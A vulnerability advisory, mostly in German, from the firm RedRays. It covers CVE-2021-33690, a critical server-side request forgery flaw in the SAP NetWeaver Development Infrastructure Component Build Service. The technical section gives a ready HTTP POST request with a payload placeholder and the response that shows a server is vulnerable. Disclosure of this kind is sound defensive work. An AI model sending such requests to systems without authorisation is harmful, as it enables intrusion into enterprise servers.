
[CVE-2021-33690] Server Side Request Forgery vulnerability in SAP NetWeaver Development Infrastructure
[CVE-2021-33690] Server-Side Request Forgery-Schwachstelle in der SAP NetWeaver Development Infrastructure
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955
SAP Approved Fixes: True
Status: analyzed and published
ADVISORY INFORMATION
Titel: [CVE-2021-33690] Server-Side Request Forgery-Schwachstelle in der SAP NetWeaver Development Infrastructure
Risiko: Kritisch
Advisory-URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/
Veröffentlichungsdatum: 1. Juni 2023
VULNERABILITY INFORMATION
Remote ausnutzbar: Ja
Lokal ausnutzbar: Nein
CVSS-Informationen
CVSS v3.1 Basis-Score: 9,9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
BESCHREIBUNG DER SCHWACHSTELLE
In verschiedenen Versionen des SAP NetWeaver Development Infrastructure Component Build Service, nämlich 7.11, 7.20, 7.30, 7.31, 7.40 und 7.50, wurde eine als Server-Side Request Forgery (SSRF) bekannte Schwachstelle identifiziert. Diese Schwachstelle im SAP NetWeaver Development Infrastructure Component Build Service ermöglicht es einem Angreifer mit Serverzugriff, über speziell zugeschnittene Abfragen Proxy-Angriffe durchzuführen. Die Folgen solcher Angriffe können zur vollständigen Kompromittierung sensibler Serverdaten führen und deren Verfügbarkeit beeinträchtigen. Es ist wichtig zu beachten, dass der Schweregrad dieser Schwachstelle davon abhängt, ob die SAP NetWeaver Development Infrastructure (NWDI) im Intranet oder im Internet betrieben wird. Der CVSS-Score wurde auf der Grundlage des schlimmsten Falls berechnet, bei dem das System online betrieben wird.
TECHNISCHE BESCHREIBUNG
Um festzustellen, ob der Server anfällig für SSRF ist, senden Sie die folgende Anfrage:
POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE
Wenn die folgende Antwort empfangen wird, deutet dies auf das Vorhandensein der Schwachstelle hin:
<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>
Über RedRays
RedRays ist ein führendes Cybersicherheitsunternehmen, das ERP-Systeme vor internen betrügerischen Aktivitäten und externen Cyberbedrohungen schützt. Wir sind stolz darauf, robuste Sicherheitslösungen für große Unternehmen und Managed Service Provider anzubieten, die auf wichtige ERP-Systeme wie SAP, Oracle und Microsoft angewiesen sind. Mit Hilfe fortschrittlicher Tools und Strategien überwachen und kontrollieren wir proaktiv die Sicherheit in großen SAP-Umgebungen weltweit.
Unser Hauptziel ist es, die Sicherheitslücke sowohl aus technischer als auch aus geschäftlicher Sicht zu schließen, um einen reibungslosen Betrieb unserer Kunden zu gewährleisten und ihre wertvollen Daten zu schützen. Wir bei RedRays verpflichten uns, höchste Sicherheitsstandards aufrechtzuerhalten und gleichzeitig außergewöhnlichen Kundenservice und -unterstützung zu bieten.
Über RedRays F&E
Der Grundstein für die Erfolge von RedRays liegt in unserer Forschungs- und Entwicklungsabteilung (F&E), die sich auf die Untersuchung und Analyse von Schwachstellen in wichtigen Unternehmensanwendungen spezialisiert hat. Unsere F&E-Initiativen haben Anerkennung und Lob von führenden Softwareunternehmen wie SAP, Oracle, Microsoft Dynamics und IBM erhalten. Dieses Engagement für die Forschung ermöglicht es uns, aufkommende Bedrohungen vorherzusehen und maßgeschneiderte Sicherheitslösungen zu entwickeln, die den Anforderungen unserer Kunden gerecht werden.
Unser Team besteht aus erfahrenen Fachleuten mit vielfältigen Fähigkeiten in verschiedenen Sicherheitsbereichen, wie Schwachstellenbewertung, Penetrationstests, Incident Management und Threat Intelligence. Unser Engagement gilt der Durchführung gründlicher Forschung und der Bereitstellung avantgardistischer Lösungen, um SAP-Systeme gegen sich ständig ändernde Bedrohungen zu stärken.
Bei Fragen oder weiteren Details zögern Sie nicht, uns zu kontaktieren: